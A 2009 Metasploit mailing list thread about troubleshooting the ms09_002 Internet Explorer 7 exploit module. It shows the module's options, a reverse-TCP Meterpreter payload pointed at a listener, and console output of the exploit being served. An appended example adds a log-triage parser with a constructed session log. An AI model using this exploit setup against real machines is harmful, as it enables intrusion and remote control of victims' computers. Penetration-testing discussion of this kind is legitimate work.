Metasploit mailing list archives

use of ms09_002 and xml_corruption modules


From: natron at invisibledenizen.org (natron)
Date: Wed, 1 Apr 2009 13:09:43 -0500

It's not hanging.  The module's letting you know a request came in and
it responded with the html code.  Depending on your payload, if the
exploit was successful, you would see further messages about the
additional stages being downloaded and then dumped at the payload
prompt.

What you're seeing is what you would see if the browser was not
vulnerable to either of those exploits.  You have most likely already
patched.

On Wed, Apr 1, 2009 at 1:07 PM, jeffs <jeffs at speakeasy.net> wrote:
When I use either of these modules 'sploit just hangs on the last line -- am
I to presume that means my version of IE7 is not vulnerable or do I
perchance have a wrong setting below?

thanks.

Same result with xml_corruption..


Module options:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host to listen on.
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Use SSL
   URIPATH  test             no        The URI to use for this exploit (default is random)

Payload options (windows/reflectivemeterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process
   LHOST     192.168.1.101    yes       The local address
   LPORT     4444             yes       The local port

Exploit target:

   Id  Name
   --  ----
   0   Windows XP SP2-SP3 / Windows Vista SP0 / IE 7

msf exploit(ms09_002_memory_corruption) > exploit
[*] Exploit running as background job.
msf exploit(ms09_002_memory_corruption) >
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:8080/test
[*]  Local IP: http://192.168.1.101:8080/test
[*] Server started.
[*] Sending Internet Explorer 7 Uninitialized Memory Corruption Vulnerability to 192.168.1.100:1704...   <----- just hangs here
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework
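The distinction natron draws above (the server answered the browser's request versus a payload stage and session actually following) can be read mechanically off the console output. The following is an added example, not code from the thread or from the Metasploit project; the log text is constructed from the lines quoted above plus a second, hypothetical client that goes on to open a session, and attributing a "Sending stage" line to the most recent client is a heuristic assumption, since that line carries no client address.

```python
import re

# Constructed sample in the format shown in the thread. 192.168.1.100 only
# receives the exploit page (what a patched browser looks like); the
# hypothetical 192.168.1.102 pulls a stage and a session is opened.
SAMPLE_LOG = """\
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:8080/test
[*]  Local IP: http://192.168.1.101:8080/test
[*] Server started.
[*] Sending Internet Explorer 7 Uninitialized Memory Corruption Vulnerability to 192.168.1.100:1704...
[*] Sending Internet Explorer 7 Uninitialized Memory Corruption Vulnerability to 192.168.1.102:1052...
[*] Sending stage (2650 bytes)
[*] Meterpreter session 1 opened (192.168.1.101:4444 -> 192.168.1.102:1053)
"""

# "Sending <exploit name> to <ip>:<port>..." : the browser fetched the page.
SENDING_RE = re.compile(
    r"^\[\*\] Sending (?P<name>.+?) to (?P<host>\d+\.\d+\.\d+\.\d+):(?P<port>\d+)\.\.\.")
# "Sending stage (<n> bytes)" : the handler is delivering the second stage.
STAGE_RE = re.compile(r"^\[\*\] Sending stage \((?P<bytes>\d+) bytes\)")
# "<type> session <id> opened (<lhost>:<lport> -> <rhost>:<rport>)"
SESSION_RE = re.compile(
    r"^\[\*\] \w+ session (?P<id>\d+) opened "
    r"\((?P<lhost>[\d.]+):(?P<lport>\d+) -> (?P<rhost>[\d.]+):(?P<rport>\d+)\)")


def triage(log_text):
    """Map each client IP to 'page_sent' (request answered, nothing more:
    browser most likely not vulnerable), 'stage_sent' (stage delivered but
    no session reported) or 'session' (handler reported an opened session)."""
    status = {}
    last_client = None  # heuristic: stage lines name no client, assume the latest
    for line in log_text.splitlines():
        m = SENDING_RE.match(line)
        if m:
            last_client = m.group("host")
            status.setdefault(last_client, "page_sent")
            continue
        if STAGE_RE.match(line) and last_client and status[last_client] == "page_sent":
            status[last_client] = "stage_sent"
            continue
        m = SESSION_RE.match(line)
        if m:
            status[m.group("rhost")] = "session"
    return status
```

Running `triage(SAMPLE_LOG)` reports 192.168.1.100 as `page_sent`, which is exactly the "just hangs here" situation in the question, and 192.168.1.102 as `session`.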
